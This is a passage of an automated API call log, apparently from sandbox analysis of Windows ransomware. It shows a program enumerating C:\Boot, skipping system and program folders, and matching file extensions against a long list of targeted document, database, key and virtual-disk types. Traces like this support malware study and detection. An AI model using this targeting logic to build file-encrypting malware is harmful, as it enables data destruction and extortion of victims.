(lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0019.589] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.589] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.589] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\Fonts", pszFile="kor_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\Boot\\Fonts\\kor_boot.ttf" [0019.589] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0019.589] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0019.590] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.590] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.590] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\Fonts", pszFile="wgl4_boot.ttf" | out: pszDest="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\Boot\\Fonts\\wgl4_boot.ttf" [0019.590] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0019.590] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".ttf.") returned 0x0 [0019.590] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.590] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.590] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.590] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.590] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="fr-FR" | out: pszDest="C:\\Boot\\fr-FR") returned="C:\\Boot\\fr-FR" [0019.590] StrStrIW (lpFirst="C:\\Boot\\fr-FR", lpSrch="\\Windows") returned 0x0 [0019.590] StrStrIW (lpFirst="C:\\Boot\\fr-FR", lpSrch="\\Program Files") returned 0x0 [0019.590] StrStrIW (lpFirst="C:\\Boot\\fr-FR", lpSrch="\\ProgramData") returned 0x0 [0019.590] StrStrIW (lpFirst="C:\\Boot\\fr-FR", lpSrch="\\AppData") returned 0x0 [0019.590] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\fr-FR", pszFile="*" | out: pszDest="C:\\Boot\\fr-FR\\*") returned="C:\\Boot\\fr-FR\\*" [0019.590] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.591] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.591] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.591] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.591] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.591] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.591] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\fr-FR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\Boot\\fr-FR\\bootmgr.exe.mui" [0019.591] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.591] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.592] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.592] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.592] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.592] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.592] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="hu-HU" | out: pszDest="C:\\Boot\\hu-HU") returned="C:\\Boot\\hu-HU" [0019.592] StrStrIW (lpFirst="C:\\Boot\\hu-HU", lpSrch="\\Windows") returned 0x0 [0019.592] StrStrIW (lpFirst="C:\\Boot\\hu-HU", lpSrch="\\Program Files") returned 0x0 [0019.592] StrStrIW (lpFirst="C:\\Boot\\hu-HU", lpSrch="\\ProgramData") returned 0x0 [0019.592] StrStrIW (lpFirst="C:\\Boot\\hu-HU", lpSrch="\\AppData") returned 0x0 [0019.592] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\hu-HU", pszFile="*" | out: pszDest="C:\\Boot\\hu-HU\\*") returned="C:\\Boot\\hu-HU\\*" [0019.592] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.592] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.592] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.592] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.592] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.593] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.593] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\hu-HU", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\Boot\\hu-HU\\bootmgr.exe.mui" [0019.593] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.593] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.593] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.593] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.593] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.593] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.593] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="it-IT" | out: pszDest="C:\\Boot\\it-IT") returned="C:\\Boot\\it-IT" [0019.593] StrStrIW (lpFirst="C:\\Boot\\it-IT", lpSrch="\\Windows") returned 0x0 [0019.593] StrStrIW (lpFirst="C:\\Boot\\it-IT", lpSrch="\\Program Files") returned 0x0 [0019.593] StrStrIW (lpFirst="C:\\Boot\\it-IT", lpSrch="\\ProgramData") returned 0x0 [0019.593] StrStrIW (lpFirst="C:\\Boot\\it-IT", lpSrch="\\AppData") returned 0x0 [0019.593] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\it-IT", pszFile="*" | out: pszDest="C:\\Boot\\it-IT\\*") returned="C:\\Boot\\it-IT\\*" [0019.593] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.594] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.594] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.594] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.594] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.594] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.594] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\it-IT", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\Boot\\it-IT\\bootmgr.exe.mui" [0019.594] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.594] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.595] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.595] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.595] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.595] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.595] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="ja-JP" | out: pszDest="C:\\Boot\\ja-JP") returned="C:\\Boot\\ja-JP" [0019.595] StrStrIW (lpFirst="C:\\Boot\\ja-JP", lpSrch="\\Windows") returned 0x0 [0019.595] StrStrIW (lpFirst="C:\\Boot\\ja-JP", lpSrch="\\Program Files") returned 0x0 [0019.595] StrStrIW (lpFirst="C:\\Boot\\ja-JP", lpSrch="\\ProgramData") returned 0x0 [0019.595] StrStrIW (lpFirst="C:\\Boot\\ja-JP", lpSrch="\\AppData") returned 0x0 [0019.595] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\ja-JP", pszFile="*" | out: pszDest="C:\\Boot\\ja-JP\\*") returned="C:\\Boot\\ja-JP\\*" [0019.595] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.595] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.595] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.595] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.595] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.596] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.596] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\ja-JP", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\Boot\\ja-JP\\bootmgr.exe.mui" [0019.596] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.596] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.596] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.596] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.596] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.596] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.596] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="ko-KR" | out: pszDest="C:\\Boot\\ko-KR") returned="C:\\Boot\\ko-KR" [0019.596] StrStrIW (lpFirst="C:\\Boot\\ko-KR", lpSrch="\\Windows") returned 0x0 [0019.596] StrStrIW (lpFirst="C:\\Boot\\ko-KR", lpSrch="\\Program Files") returned 0x0 [0019.596] StrStrIW (lpFirst="C:\\Boot\\ko-KR", lpSrch="\\ProgramData") returned 0x0 [0019.596] StrStrIW (lpFirst="C:\\Boot\\ko-KR", lpSrch="\\AppData") returned 0x0 [0019.596] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\ko-KR", pszFile="*" | out: pszDest="C:\\Boot\\ko-KR\\*") returned="C:\\Boot\\ko-KR\\*" [0019.596] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.597] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.597] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.597] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.597] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.598] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.598] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\ko-KR", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\Boot\\ko-KR\\bootmgr.exe.mui" [0019.598] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.598] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.598] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.598] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.598] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.598] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.598] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="memtest.exe" | out: pszDest="C:\\Boot\\memtest.exe") returned="C:\\Boot\\memtest.exe" [0019.598] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0019.598] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".exe.") returned 0x0 [0019.598] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.598] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.598] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="nb-NO" | out: pszDest="C:\\Boot\\nb-NO") returned="C:\\Boot\\nb-NO" [0019.598] StrStrIW (lpFirst="C:\\Boot\\nb-NO", lpSrch="\\Windows") returned 0x0 [0019.598] StrStrIW (lpFirst="C:\\Boot\\nb-NO", lpSrch="\\Program Files") returned 0x0 [0019.599] StrStrIW (lpFirst="C:\\Boot\\nb-NO", lpSrch="\\ProgramData") returned 0x0 [0019.599] StrStrIW (lpFirst="C:\\Boot\\nb-NO", lpSrch="\\AppData") returned 0x0 [0019.599] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\nb-NO", pszFile="*" | out: pszDest="C:\\Boot\\nb-NO\\*") returned="C:\\Boot\\nb-NO\\*" [0019.599] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.599] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.599] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.599] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.599] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.599] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.599] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\nb-NO", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\Boot\\nb-NO\\bootmgr.exe.mui" [0019.599] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.599] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.600] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.600] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.600] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.600] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.600] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="nl-NL" | out: pszDest="C:\\Boot\\nl-NL") returned="C:\\Boot\\nl-NL" [0019.600] StrStrIW (lpFirst="C:\\Boot\\nl-NL", lpSrch="\\Windows") returned 0x0 [0019.600] StrStrIW (lpFirst="C:\\Boot\\nl-NL", lpSrch="\\Program Files") returned 0x0 [0019.600] StrStrIW (lpFirst="C:\\Boot\\nl-NL", lpSrch="\\ProgramData") returned 0x0 [0019.600] StrStrIW (lpFirst="C:\\Boot\\nl-NL", lpSrch="\\AppData") returned 0x0 [0019.600] PathCombineW (in: pszDest=0x31ceb68, pszDir="C:\\Boot\\nl-NL", pszFile="*" | out: pszDest="C:\\Boot\\nl-NL\\*") returned="C:\\Boot\\nl-NL\\*" [0019.600] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0x368330 [0019.602] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.602] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.602] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.602] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0019.602] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.602] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\Boot\\nl-NL", pszFile="bootmgr.exe.mui" | out: pszDest="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned="C:\\Boot\\nl-NL\\bootmgr.exe.mui" [0019.602] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0019.602] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".mui.") returned 0x0 [0019.602] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 0 [0019.602] FindClose (in: hFindFile=0x368330 | out: hFindFile=0x368330) returned 1 [0019.602] FindNextFileW (in: hFindFile=0x3682f0, lpFindFileData=0x31ced98 | out: lpFindFileData=0x31ced98) returned 1 [0019.602] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0019.603] PathCombineW (in: pszDest=0x31cefe8, pszDir="C:\\Boot", pszFile="pl-PL" | out: pszDest="C:\\Boot\\pl-PL") returned="C:\\Boot\\pl-PL" [0019.603] StrStrIW (lpFirst="C:\\Boot\\pl-PL", lpSrch="\\Windows") returned 0x0 [0019.603] StrStrIW (lpFirst="C:\\Boot\\pl-PL", lpSrch="\\Program Files") returned 0x0 [0019.603] StrStrIW (lpFirst="C:\\Boot\\pl-PL", lpSrch="\\ProgramData") returned 0x0 [0019.603] StrStrIW (lpFirst="C:\\Boot\\pl-PL", lpSrch="\\AppData") returned 